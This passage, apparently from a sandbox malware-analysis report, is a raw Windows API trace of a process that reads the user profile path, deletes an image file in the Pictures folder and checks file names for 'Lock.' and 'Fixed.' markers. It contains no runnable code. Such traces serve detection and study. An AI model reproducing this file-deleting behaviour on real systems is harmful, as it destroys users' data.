hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.103] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.103] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.103] CloseHandle (hObject=0x520) returned 1 [0211.104] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.104] CloseHandle (hObject=0x4dc) returned 1 [0211.106] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.106] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.106] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0211.106] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0211.107] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/Oj8L14m5Ftw_q T.bmp", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\Oj8L14m5Ftw_q T.bmp", lpFilePart=0x8cedf4*="Oj8L14m5Ftw_q T.bmp") returned 0x2d [0211.107] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Oj8L14m5Ftw_q T.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\oj8l14m5ftw_q t.bmp")) returned 0x20 [0211.107] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Oj8L14m5Ftw_q T.bmp", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d874440, ftCreationTime.dwHighDateTime=0x1d5ccc8, ftLastAccessTime.dwLowDateTime=0x91950f80, ftLastAccessTime.dwHighDateTime=0x1d5cf0c, ftLastWriteTime.dwLowDateTime=0x91950f80, ftLastWriteTime.dwHighDateTime=0x1d5cf0c, nFileSizeHigh=0x0, nFileSizeLow=0x115b, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Oj8L14m5Ftw_q T.bmp", cAlternateFileName="OJ8L14~1.BMP")) returned 0x9e2138 [0211.107] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Oj8L14m5Ftw_q T.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\oj8l14m5ftw_q t.bmp")) returned 1 [0211.110] FindNextFileW (in: hFindFile=0x9e2138, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d874440, ftCreationTime.dwHighDateTime=0x1d5ccc8, ftLastAccessTime.dwLowDateTime=0x91950f80, ftLastAccessTime.dwHighDateTime=0x1d5cf0c, ftLastWriteTime.dwLowDateTime=0x91950f80, ftLastWriteTime.dwHighDateTime=0x1d5cf0c, nFileSizeHigh=0x0, nFileSizeLow=0x115b, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Oj8L14m5Ftw_q T.bmp", cAlternateFileName="OJ8L14~1.BMP")) returned 0 [0211.110] FindClose (in: hFindFile=0x9e2138 | out: hFindFile=0x9e2138) returned 1 [0211.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0211.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0211.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0211.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0211.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0211.110] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0211.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0211.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0211.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0211.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0211.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0211.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0211.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0211.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0211.110] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0211.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0211.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0211.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa570 [0211.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0211.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0211.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa708 [0211.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0211.111] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0211.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0211.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0211.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0211.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0211.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0211.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0211.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0211.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0211.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0211.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0211.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0211.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0211.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0211.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0211.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0211.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0211.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0211.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0211.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0211.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0211.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0211.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0211.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0211.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0211.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0211.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0211.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0211.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0211.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0211.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0211.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0211.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0211.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0211.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0211.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0211.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0211.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0211.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0211.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5c) returned 0x2a74df8 [0211.112] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/Oj8L14m5Ftw_q T.bmp", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\Oj8L14m5Ftw_q T.bmp", lpFilePart=0x8cf650*="Oj8L14m5Ftw_q T.bmp") returned 0x2d [0211.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74df8 | out: hHeap=0x2af0000) returned 1 [0211.112] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Oj8L14m5Ftw_q T.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\oj8l14m5ftw_q t.bmp")) returned 0xffffffff [0211.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0211.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0211.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0211.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0211.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0211.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0211.113] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0211.113] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.113] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0211.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0211.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0211.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0211.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0211.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0211.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0211.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0211.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0211.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0211.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0211.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0211.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0211.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pkrWGiqtaBO.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="krWGiqtaBO.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rWGiqtaBO.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WGiqtaBO.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GiqtaBO.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iqtaBO.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qtaBO.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="taBO.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aBO.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BO.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0211.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0211.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0211.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0211.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0211.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0211.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0211.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0211.114] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0211.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0211.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0211.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0211.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0211.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0211.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0211.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0211.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0211.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0211.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0211.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0211.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0211.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0211.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0211.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0211.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0211.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0211.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0211.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0211.115] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pkrWGiqtaBO.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.115] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="krWGiqtaBO.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.115] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rWGiqtaBO.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.115] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WGiqtaBO.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.115] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GiqtaBO.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.115] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iqtaBO.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.115] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qtaBO.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.115] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="taBO.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.115] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aBO.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.115] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BO.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0211.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0211.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0211.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0211.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0211.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0211.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0211.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0211.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0211.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0211.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0211.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0211.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0211.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6648 | out: hHeap=0x2af0000) returned 1 [0211.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0211.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0211.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0211.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0211.116] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0211.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0211.116] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0211.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0211.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0211.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b68 [0211.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0211.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0211.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0211.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0211.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0211.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0211.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0211.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0211.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0211.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0211.116] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0211.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0211.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0211.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa810 [0211.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0211.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0211.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa708 [0211.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0211.116] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0211.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0211.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0211.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0211.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0211.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0211.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0211.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 